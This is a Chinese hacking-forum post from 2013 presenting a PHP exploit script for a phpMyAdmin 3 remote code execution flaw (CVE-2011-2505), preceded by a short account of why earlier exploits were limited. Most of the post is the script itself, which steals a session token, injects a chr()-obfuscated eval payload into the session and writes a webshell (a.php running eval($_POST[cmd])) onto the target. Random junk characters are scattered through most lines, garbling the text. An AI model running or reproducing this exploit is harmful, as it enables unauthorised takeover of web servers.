找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2215|回复: 0
打印 上一主题 下一主题

phpadmin3 remote code execute php版本exploit

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-21 09:13:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。" G, k/ ?7 n5 E
5 x$ V- q' B) H0 b" b
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
" H+ A$ u5 y3 j' y3 E" U  P" h3 A) E0 |, N1 i
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
% o( }5 R1 S2 R9 R一是session.auto_start = 1;
" i2 S) x8 ~( E. U" d& t二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。1 l8 `2 B! \: k* K- C) @, |
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
+ k- Z7 `) i" h/ g5 y( R( {0 t( K+ Q8 o1 c& c/ G
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
5 }1 v- U/ h5 S2 J+ M
  [) w/ a, X6 N4 g/ F# F: b9 ]$ X2 j于是写了这个php版本的exp,代码如下:
( d. `# R8 n: C$ _8 Y% J! W6 o: O
5 I# e% _) s- v: g#!/usr/bin/php
, X6 d5 T9 o6 ^. W. b2 e<?php
% ]( G  t8 ]/ eprint_r('
3 Z( P. a1 U- d: b+---------------------------------------------------------------------------+
) j4 q! z. Z; B8 Lpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]" _: s2 H1 ?# J
by oldjun(www.oldjun.com)$ _: r; Q3 ]: l( \' O4 I" r
welcome to www.t00ls.net& b; P5 d; @9 i; r% h
mail: oldjun@gmail.com
7 y4 I! j. U* b: q4 T8 qAssigned CVE id: CVE-2011-2505  I7 ^" W/ i% f6 E) J
+---------------------------------------------------------------------------+5 g7 l- z9 i) A, r# W
');
* {# p* i2 f. N4 U0 u% v) I; w8 q
, B7 A! a1 b. L3 Q/**
; E, N$ ?* x) F. {; P * working when the directory:"config" exists and is writeable.; v7 }7 C6 D4 ^& b# S. w
**/8 r) X. @& Z5 J  G

8 S5 s! k2 Q# R$ F2 {: v- xif ($argc < 3) {0 q" C. G9 ]/ W
    print_r('+ Z3 t/ y) J* e  s5 {9 D
+---------------------------------------------------------------------------+
- O) h" r5 q9 dUsage: php '.$argv[0].' host path8 q/ f2 [# {/ r/ b
host:      target server (ip/hostname)# S8 E; t; [/ i0 _( {
path:      path to pma3
  {& I8 R* p) h) j# y2 _( y- _Example:
/ s6 I8 V! {0 G. s' `php '.$argv[0].' localhost /pma/5 y+ \2 D1 K: O3 f. v2 I. M
+---------------------------------------------------------------------------+3 S- }# `, C  I, {4 p
');
5 c, f+ h: E& b, A    exit;' X2 m( ^# [: M( _0 U$ h; n
}; s0 H  o: U7 _, V
& Q) W2 `: v' e5 D0 u, _! ?& H
$host = $argv[1];
+ k8 \- R1 U) ]2 X$path = $argv[2];
: ?. L% f( q0 d+ ?7 g
* g! G/ I, \* s$ P/**. `5 b4 f& Y9 C! ^6 {
* Try to determine if the directory:"config" exists
' X1 ~2 U( }% D9 s' H4 h1 O**/
% }# [; a6 h, Y  I/ `4 ]6 Kecho "[+] Try to determine if the directory:config exists....\n";% }* O  A& K$ [' ?
$returnstr=php_request('config/');$ [' G; A9 l1 d8 M) J" y
if(strpos($returnstr,'404')){' ?8 `& i2 q/ b& c: Y
    exit("[-] Exploit Failed! The directory:config do not exists!\n");$ t! i2 ^) D/ `  E5 ~
}
5 g* J2 a. {# q  f. B% w( D% a+ j
6 r; Q, E: X' ^4 C, S# y/**
$ J, g6 _! j! z3 B- s5 N0 L * Try to get token and sessionid( o$ _: _6 V; {6 [1 p
**/
5 e" T) {8 N" H. iecho "[+] Try to get token and sessionid....\n";
9 b4 a" R# w+ r: E4 R$result=php_request('index.php');% K+ L9 y3 b- X# \' A
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);: p) Z0 M6 Q! P! `1 a+ ~% R+ x  l# \
$token=$resp[3];) ~2 y2 z$ v9 y- V+ W1 o
$sessionid=$resp[1];/ B# m  \8 U, D' e6 T& I
if($token && $sessionid){* y! z8 x4 F$ u' O# ]
    echo "[+] tokentoken\n";
/ H2 j, x' {  e0 M7 B0 u$ O3 p    echo "[+] Session IDsessionid\n";# {8 A7 W' O- T
}else{9 n% V2 R4 t% n5 Y! A0 ^
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
7 X' b* \) s& f}
1 R8 D' b7 ~1 x3 x+ C2 P8 R7 c+ d' N7 B; `; W/ i( e$ S7 r& @
/**
& s( |4 g- q1 q) o" Z. N4 V" G * Try to insert shell into session6 G# _5 t; V) f5 H+ Z6 C& z
**/; w+ g$ x0 a/ x9 \5 {: u0 N
echo "[+] Try to insert shell into session....\n";
% r* k% T5 `' tphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
5 E. d& Z) k9 N( S% @% u) `
  ~  t( n9 _: A8 ]( C* p& g- z( K/**' m/ X+ B3 m/ o3 _1 g
* Try to create webshell, b) ?2 x+ K9 E8 i8 i3 M
**/
  V* Y# ?5 X3 b3 Q4 c7 Z/ A2 s9 `" Gecho "[+] Try to create webshell....\n";
+ @. F2 P1 A' b* e, H/ d* ephp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
" d$ N/ q( J( l& d8 b/**
& P0 p+ ?3 Q* e3 S( h: X * Try to check if the webshell was created successfully/ f" y5 N" s$ v
**/+ T8 t- S: v# ^8 E/ J
echo "[+] Try to check if the webshell was created successfully....\n";
( k1 O6 u+ ?# |" J$content=php_request('config/config.inc.php');5 h( x) T$ f3 r
if(strpos($content,'t00ls')){
3 u& a- M7 t. A6 _+ x& L" E# V4 e    echo "[+] Congratulations! Expoilt successfully....\n";
6 s6 d0 j+ D  Z& }- o    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
! r( l5 P3 I$ M( q: w* R; v}else{; g; S; D2 Q7 C! v
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
% t& x& B2 a6 R8 W, G9 w( L( i}
5 K* q0 f7 Y3 v' e1 {8 J; e! C( ^9 f; z2 i
function php_request($url,$data='',$cookie=''){8 H2 k+ G, K7 d7 x6 c9 O7 H, C$ y) Q
    global  $host, $path;7 Z% @- j/ Q6 D) @
    9 g6 _+ _+ j( C' |
    $method=$data?'POST':'GET';
3 r( t3 K8 \2 Q/ X   
7 k& c+ F5 `% O1 T8 [9 p" B    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
* |3 }+ I/ U% I    $packet .= "Accept: */*\r\n";4 b) [; M/ @% r
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";9 K" S- e* l: M9 A" a
    $packet .= "Host: $host\r\n";
' Q+ D$ q6 M0 c; J    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
6 s+ n4 B5 T2 T5 V4 \7 F5 S$ e) G    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
5 d  I$ ]* ]4 q/ I/ r- m5 S+ w    $packet .= $cookie?"Cookie: $cookie\r\n":"";
7 M1 W8 u4 O$ Y" y    $packet .= "Connection: Close\r\n\r\n";0 I/ T- Z% t  p
    $packet .= $data?$data:"";9 A* o: V: ~9 W6 @1 g; y
- u8 K8 M9 R4 T
    $fp = fsockopen(gethostbyname($host), 80);! l: x5 w+ \& T8 o9 I5 i1 U
    if (!$fp) {. C: H: H/ w* u7 P5 H) l, U
    echo 'No response from '.$host; die;- W$ Q2 O' V9 o* D" s3 J3 C% q
    }
! V7 I" X' K! J/ F; `: {% B6 g    fputs($fp, $packet);9 r3 j  B$ P3 \( }7 D  y1 `

: i+ r0 K+ v4 _4 B4 ]    $resp = '';9 m' @, f$ K5 G4 s% P' a
" Y. x5 g$ \* ?
    while ($fp && !feof($fp))
* \4 y4 m6 A3 X# Z3 N        $resp .= fread($fp, 1024);& K/ I8 L, a3 A( E5 }, N

0 Q! @3 a# l! N! }8 ~+ l    return $resp;' Q7 w$ T+ P" y* u% i7 i
}
4 r* h$ i4 H6 U' k    / Y/ \/ J# t/ T* W& k
?>
2 p0 j; K6 S# _% N.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表